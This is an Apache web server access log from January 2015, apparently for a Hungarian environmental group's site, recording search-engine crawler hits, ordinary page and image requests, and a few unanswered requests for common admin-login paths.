89.223.151.148 - - [09/Jan/2015:08:47:26 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
66.249.78.74 - - [09/Jan/2015:09:09:17 +0100] "GET /aktualis_elemei/katonai.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
37.57.231.110 - - [09/Jan/2015:09:16:54 +0100] "GET /wp-login.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4"
37.57.231.110 - - [09/Jan/2015:09:16:55 +0100] "GET /administrator/ HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4"
37.57.231.110 - - [09/Jan/2015:09:16:55 +0100] "GET /admin.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4"
157.55.39.145 - - [09/Jan/2015:09:20:55 +0100] "GET /aktualis_elemei/bio2szulinap_elemei/image104.jpg HTTP/1.1" 200 8372 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.78.67 - - [09/Jan/2015:09:50:41 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.55.39.145 - - [09/Jan/2015:09:54:30 +0100] "GET /aktualis_elemei/bio2szulinap_elemei/image108.jpg HTTP/1.1" 200 9238 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.35 - - [09/Jan/2015:10:06:12 +0100] "GET /aktualis_elemei/bio2szulinap_elemei/image118.jpg HTTP/1.1" 200 9292 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.78.74 - - [09/Jan/2015:10:38:50 +0100] "GET /kiadvany/delbukk.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.101 - - [09/Jan/2015:10:48:18 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
78.139.55.192 - - [09/Jan/2015:11:10:48 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Java/1.7.0_09"
176.63.171.168 - - [09/Jan/2015:11:15:08 +0100] "GET / HTTP/1.1" 200 884 "http://www.ceeweb.org/members/full-members/hungary/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
176.63.171.168 - - [09/Jan/2015:11:15:09 +0100] "GET /pattern.jpg HTTP/1.1" 200 13798 "http://www.greenaction.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
176.63.171.168 - - [09/Jan/2015:11:15:09 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
176.63.171.168 - - [09/Jan/2015:11:15:09 +0100] "GET /zoldakcio.swf HTTP/1.1" 200 840351 "http://www.greenaction.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
176.63.171.168 - - [09/Jan/2015:11:15:09 +0100] "GET /hirek/hirek.txt HTTP/1.1" 200 96857 "http://www.greenaction.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
176.63.171.168 - - [09/Jan/2015:11:15:09 +0100] "GET /banner/norway.jpg HTTP/1.1" 200 3191 "http://www.greenaction.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
